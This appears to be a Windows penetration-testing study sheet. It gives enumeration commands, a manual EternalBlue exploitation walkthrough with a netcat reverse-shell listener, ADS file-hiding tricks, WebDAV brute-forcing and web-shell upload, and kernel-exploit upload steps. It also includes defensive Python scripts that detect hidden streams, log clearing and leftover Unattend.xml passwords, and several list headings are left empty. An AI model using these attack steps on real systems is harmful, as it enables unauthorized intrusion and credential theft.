Windows
Windows is the most used operating system, with over 70% share, and is developed in the C programming language.

There have been (and still are) critical vulnerabilities, so it is an OS that is frequently targeted by attacks.
A new Windows version or update often fixes a vulnerability, but not every company keeps its systems updated.
Useful Windows Commands
Get all users:
net users
Get current user:
whoami
Get hostname:
hostname
Get local administrator groups:
net localgroup administrators
Get local groups:
net localgroup
Get your account (Meterpreter command):
getuid
Get your privileges (Meterpreter command):
getprivs
List installed programs:
wmic product get name,version
List network interfaces:
ipconfig /all
List running processes:
tasklist
List startup programs:
wmic startup get caption,command
Show user details:
net user <username>
System info:
systeminfo
Start a shell session (Meterpreter command):
shell
Exploit Windows
Access Token Impersonation
Access tokens are a core part of Windows authentication and are managed by the Local Security Authority Subsystem Service (LSASS).
An access token is used to identify and describe the security context of a process running on the system.
Access tokens are generated by winlogon.exe every time a user authenticates and include the identity and privileges of the user account associated with the process.
These techniques can be used to gain access and elevate privileges with Metasploit.
You can try to exploit and impersonate tokens with a Metasploit module called Incognito.
Alternate Data Streams (ADS)
Alternate Data Streams (ADS) is an NTFS file attribute that was designed for compatibility with the macOS HFS (Hierarchical File System).
Any file created on an NTFS-formatted drive has two streams: the data stream and the resource stream.
The data stream is the content of the file (like the text in a text file or the audio in an audio file).
The resource stream is the information about the file (like when it was created, by whom, its dimensions, etc.).
Attackers can use ADS to hide malicious code in files in order to avoid detection.
Create a "secret" file:
notepad text.txt:secret.txt
After this command Notepad will open and you can write/edit the secret.txt file.
When you save, you will only see the text.txt file, and it looks empty!
If you want to edit/access that hidden file you have to use notepad text.txt:secret.txt again.
Hide a file "behind" a text file:
type file.exe > otherfile.txt:file.exe
Create a hidden link to the file:
mklink wupdate.exe C:\Temp\windowslog.txt:winpeas.exe
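The defender's counterpart to the commands above: the built-in `dir /R` lists every stream of every file, with alternate streams shown as `file:stream:$DATA` lines that carry a size but no date. The following Python script is an added example, not part of the original notes; it parses a constructed `dir /R` listing (the sample text below is made up, not captured from a real host, and its file names just mirror the ones used above) and lists every alternate stream, flagging non-standard streams with executable-looking names such as the `winpeas.exe` stream from the mklink trick.

```python
import re
from dataclasses import dataclass

# Constructed sample of `dir /R` output; the file names mirror the notes above,
# the dates, sizes and volume serial are made up.
SAMPLE_LISTING = """\
 Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\\Temp

01/05/2024  10:12 AM    <DIR>          .
01/05/2024  10:12 AM    <DIR>          ..
01/05/2024  10:15 AM                 0 text.txt
                                    27 text.txt:secret.txt:$DATA
01/05/2024  10:20 AM               512 windowslog.txt
                                73,216 windowslog.txt:winpeas.exe:$DATA
01/05/2024  10:30 AM           204,800 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
               3 File(s)        205,312 bytes
               2 Dir(s)  10,000,000,000 bytes free
"""

# Alternate-stream lines: optional thousands separators, then host:stream:$DATA
STREAM_RE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")
DIR_RE = re.compile(r"^\s*Directory of (.+?)\s*$")

# Streams that are normally present and are not by themselves a sign of hiding
BENIGN_STREAMS = {"Zone.Identifier"}   # mark-of-the-web written by browsers
EXECUTABLE_EXT = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".scr")


@dataclass
class AltStream:
    path: str      # full path of the host file
    stream: str    # name of the alternate stream
    size: int      # bytes stored in the stream

    def suspicious(self) -> bool:
        """True for non-standard streams whose name looks like an executable."""
        return (self.stream not in BENIGN_STREAMS
                and self.stream.lower().endswith(EXECUTABLE_EXT))


def find_alternate_streams(listing: str) -> list:
    """Parse `dir /R` text and return every alternate data stream it lists."""
    current_dir = ""
    found = []
    for line in listing.splitlines():
        m = DIR_RE.match(line)
        if m:
            current_dir = m.group(1)      # remember which directory we are in
            continue
        m = STREAM_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append(AltStream(path=f"{current_dir}\\{m.group(2)}",
                                   stream=m.group(3), size=size))
    return found


def suspicious_streams(listing: str) -> list:
    """Only the streams worth a closer look."""
    return [s for s in find_alternate_streams(listing) if s.suspicious()]


if __name__ == "__main__":
    for s in find_alternate_streams(SAMPLE_LISTING):
        flag = "SUSPICIOUS" if s.suspicious() else "ok"
        print(f"{flag:10} {s.path}:{s.stream} ({s.size} bytes)")
```

On a real host you would feed it the output of `dir /R /S C:\ > streams.txt` instead of the constructed sample; the `Zone.Identifier` stream is deliberately treated as benign because browsers write it to every downloaded file.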
BlueKeep
BlueKeep is an RDP vulnerability that lets attackers gain access to Windows systems
by reaching a chunk of kernel memory and executing arbitrary code on the target.
Please note that writing code into the kernel can make the system crash.
This vulnerability can be exploited with the Metasploit framework.
Clearing Windows Event Logs
Windows saves every log in the Windows Event Log.
Logs are stored and categorized based on the type of event they record.
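Clearing a log is itself logged: Windows writes event ID 1102 ("The audit log was cleared") to the Security log and event ID 104 to the System log when another log is cleared, and both name the account that did it. The following Python script is an added example, not part of the original notes; it takes an XML export in the shape produced by `wevtutil qe <log> /f:xml` (the sample below is constructed, with made-up host, user and timestamps, although the event IDs and element names are the real ones) and reports every log-clearing event with who cleared which log.

```python
import xml.etree.ElementTree as ET

# Event IDs that record a log being cleared (these IDs are real):
#   1102 - Security log cleared (written to the Security channel)
#    104 - System or Application log cleared (written to the System channel)
CLEAR_EVENT_IDS = {"1102", "104"}

# Constructed sample in the XML shape that `wevtutil qe <log> /f:xml` emits.
# Host name, user names and timestamps are made up for this example.
SAMPLE_EVENTS = """<Events>
  <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System>
      <Provider Name="Microsoft-Windows-Security-Auditing"/>
      <EventID>4624</EventID>
      <TimeCreated SystemTime="2024-01-05T10:10:00Z"/>
      <Channel>Security</Channel>
      <Computer>WS01.example.test</Computer>
    </System>
  </Event>
  <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System>
      <Provider Name="Microsoft-Windows-Eventlog"/>
      <EventID>1102</EventID>
      <TimeCreated SystemTime="2024-01-05T10:15:00Z"/>
      <Channel>Security</Channel>
      <Computer>WS01.example.test</Computer>
    </System>
    <UserData>
      <LogFileCleared xmlns="http://schemas.microsoft.com/win/2004/08/events/auditing">
        <SubjectUserName>jdoe</SubjectUserName>
        <SubjectDomainName>CORP</SubjectDomainName>
      </LogFileCleared>
    </UserData>
  </Event>
  <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System>
      <Provider Name="Microsoft-Windows-Eventlog"/>
      <EventID>104</EventID>
      <TimeCreated SystemTime="2024-01-05T10:16:00Z"/>
      <Channel>System</Channel>
      <Computer>WS01.example.test</Computer>
    </System>
    <UserData>
      <LogFileCleared xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog">
        <SubjectUserName>jdoe</SubjectUserName>
        <SubjectDomainName>CORP</SubjectDomainName>
        <Channel>Application</Channel>
      </LogFileCleared>
    </UserData>
  </Event>
</Events>
"""


def detect_log_clearing(events_xml: str) -> list:
    """Return one alert dict per log-clear event found in the XML export."""
    alerts = []
    root = ET.fromstring(events_xml)
    for event in root.findall("{*}Event"):           # {*} = any namespace (Python 3.8+)
        system = event.find("{*}System")
        event_id = (system.findtext("{*}EventID") or "").strip()
        if event_id not in CLEAR_EVENT_IDS:
            continue
        cleared = event.find("{*}UserData/{*}LogFileCleared")
        user = domain = cleared_log = None
        if cleared is not None:
            user = cleared.findtext("{*}SubjectUserName")
            domain = cleared.findtext("{*}SubjectDomainName")
            cleared_log = cleared.findtext("{*}Channel")  # only present for ID 104
        if cleared_log is None:
            cleared_log = system.findtext("{*}Channel")   # 1102 clears the log it is written to
        alerts.append({
            "time": system.find("{*}TimeCreated").get("SystemTime"),
            "computer": system.findtext("{*}Computer"),
            "event_id": event_id,
            "cleared_log": cleared_log,
            "user": f"{domain}\\{user}" if user else "unknown",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_log_clearing(SAMPLE_EVENTS):
        print(f"{alert['time']} {alert['computer']}: {alert['cleared_log']} log cleared "
              f"by {alert['user']} (event {alert['event_id']})")
```

Because the 1102/104 records are written after the wipe, they survive it; forwarding them to a collector as they occur is what makes clearing detectable even when the local log was emptied.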
Credential Dumping - Password Hashes
Windows stores account passwords locally in the SAM (Security Accounts Manager), a database that stores the hashed passwords; authentication and validation of the credentials is handled by the Local Security Authority (LSA).
Searching for Passwords in Windows Configuration Files
Windows has a utility called Unattended Windows Setup that is used to
mass-configure Windows on different systems.
Its files, if left behind after the installation, can become a risk since
they also store the administrator credentials.
Usually these files are stored in C:\Windows\Panther\Unattend.xml or Autounattend.xml.
You can use the Metasploit framework.
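To check for this on your own hosts without a framework, the answer file can be parsed directly: every `<Value>` inside an element named `AdministratorPassword` or `Password` is credential material unless Sysprep has already replaced it with the literal `*SENSITIVE*DATA*DELETED*`. The following Python script is an added example, not part of the original notes; it audits a constructed Unattend.xml (account names and values below are made up, and the base64 value is a placeholder) and reports which password elements still hold a value and whether the `<PlainText>` flag says they are clear text, without decoding anything. The `audit_host` helper checks the two paths named above plus a root-level `C:\Autounattend.xml` and simply returns an empty report where none exists.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# Where leftover answer files are commonly found: the two Panther paths are the
# ones named in the notes, the root-level one is a further common location.
CANDIDATE_PATHS = [
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Autounattend.xml",
    r"C:\Autounattend.xml",
]
# Sysprep replaces a password it has already consumed with this literal.
SCRUBBED = "*SENSITIVE*DATA*DELETED*"

# Constructed sample answer file (names and values are made up; the base64
# string is a placeholder, not a real encoded password).
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>UABsAGEAYwBlAGgAbwBsAGQAZQByAA==</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Name>svc_deploy</Name>
            <Group>Administrators</Group>
            <Password>
              <Value>Placeholder123</Value>
              <PlainText>true</PlainText>
            </Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
      <AutoLogon>
        <Username>Administrator</Username>
        <Enabled>true</Enabled>
        <Password>
          <Value>*SENSITIVE*DATA*DELETED*</Value>
          <PlainText>true</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""


def _local(tag: str) -> str:
    """Strip the XML namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def audit_unattend(xml_text: str) -> list:
    """Return one finding per password element that still holds a real value."""
    findings = []

    def walk(elem, parent, path):
        name = _local(elem.tag)
        here = f"{path}/{name}"
        if name.endswith("Password"):
            value = (elem.findtext("{*}Value") or "").strip()
            if value and value != SCRUBBED:
                if name == "AdministratorPassword":
                    owner = "Administrator"          # implied by the element name
                elif parent is not None:
                    owner = (parent.findtext("{*}Name")        # LocalAccount
                             or parent.findtext("{*}Username")  # AutoLogon
                             or "unknown")
                else:
                    owner = "unknown"
                plaintext = (elem.findtext("{*}PlainText") or "unspecified").strip().lower()
                findings.append({"path": here, "account": owner, "plaintext": plaintext})
        for child in elem:
            walk(child, elem, here)

    walk(ET.fromstring(xml_text), None, "")
    return findings


def audit_host(paths=CANDIDATE_PATHS) -> dict:
    """Audit every candidate file that exists on this machine (empty dict when none do)."""
    report = {}
    for p in paths:
        path = Path(p)
        if path.is_file():
            report[p] = audit_unattend(path.read_text(encoding="utf-8-sig", errors="replace"))
    return report


if __name__ == "__main__":
    for f in audit_unattend(SAMPLE_UNATTEND):
        print(f"{f['path']}: account {f['account']}, plaintext={f['plaintext']}")
```

Any finding means the file should be deleted (or the value scrubbed) and the password rotated; a `plaintext=false` value is only base64, not encryption, so it counts as exposed just the same.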
EternalBlue
EternalBlue is a collection of Windows vulnerabilities that allowed attackers to gain access to Windows systems.
This vulnerability can be exploited manually (see below) or with the Metasploit framework.
EternalBlue manual exploit
Perform a port scan on 445 to check the SMB version and the OS:
sudo nmap -sV -p 445 -O target-ip
Check if the target OS is vulnerable to EternalBlue:
sudo nmap -sV -p 445 --script=smb-vuln-ms17-010 target-ip
Clone the AutoBlue-MS17-010 repository from GitHub
Change directory to shellcode:
cd shellcode
Make the script executable:
chmod +x shell_prep.sh
Execute the script:
./shell_prep.sh
Confirm (y)
Write your IP:
your-ip
Write the two LPORT(s)
Type 0 or 1
Type 0 or 1
In another terminal, start a listener on the LPORT you entered above:
nc -nvlp Lport
Go back to the repository root:
cd ..
Make the script executable:
chmod +x eternalblue_exploit7.py
Specify the 32- or 64-bit shellcode and the Windows version:
python eternalblue_exploit7.py target-ip shellcode/sc_x64.bin
Keylogging
Keylogging is the process of capturing the keystrokes entered on a system.
After you exploit a Windows target with Metasploit, you can run the keylogging commands in the Meterpreter shell.
Pass-the-Hash Attacks
Pass-the-hash is a technique that harvests NTLM hashes (or clear-text passwords)
and uses them to authenticate to the target as a legitimate user.
You can use the Meterpreter shell and the Metasploit PsExec module, or the CrackMapExec tool.
WebDav
Microsoft IIS is a web server created by Microsoft for Windows. It provides a GUI for managing web applications.
It can be used to host pages with ASP.NET and PHP.
WebDAV is an extension of the HTTP protocol.
It is used to edit and manage files on a web server (like IIS).
Both IIS and WebDAV usually run on port 80 or 443, and you can authenticate with a username and password.
Tools used to manually exploit WebDAV:
An Nmap scan tells us that the target has WebDAV.
You can confirm it by trying to navigate to target-url/webdav.
If it asks for credentials, you can use Hydra to brute-force the WebDAV login.
Once you have the right credentials you can use them to log in to the WebDAV folder in the browser.
We can use the DavTest tool to check what kinds of files or folders we can execute, upload, edit, etc.
Now we can use Cadaver to upload, execute and edit files:
cadaver http://target-ip/target-folder
Enter username and password
Run your commands in the shell you obtained
You can upload a more advanced shell with Cadaver:
put /usr/share/webshells/asp/webshell.asp
Now you can use the web shell directly in the browser!
WinRM
Windows Remote Management (WinRM) is a remote management protocol that provides access to Windows systems over HTTP(S).
It typically runs on port 5985 (HTTP) or 5986 (HTTPS), but it must be configured, since it is not enabled by default.
WinRM supports various forms of authentication. You can use CrackMapExec to brute-force credentials.
You can also use a Ruby script called evil-winrm to obtain a command shell session on the target.
Windows Kernel Exploits
Privilege escalation is the process of exploiting a vulnerability on a target to elevate a user's privileges.
The kernel is the computer program at the core of an operating system; it has complete access to the resources and hardware of the system.
Windows NT is the kernel used by Windows and has
user mode and kernel mode (the first has limited privileges, while the second has full access).
Privilege escalation on Windows will usually follow these guidelines:
Some of the tools used are:
Use Windows Kernel Exploits
After you have gained access to a Windows target with Metasploit:
Move to the C: drive root:
cd C:\\
Move to the Temp folder:
cd Temp
Upload the .exe file you got from the GitHub repo, specifying the folder/path where you saved it:
upload your-folder/your-file.exe
Open a shell in the Temp folder:
shell
Execute the .exe file you have just uploaded:
.\your-file.exe
Windows Vulnerabilities
Most common Windows vulnerabilities are:
Most Exploited Windows services: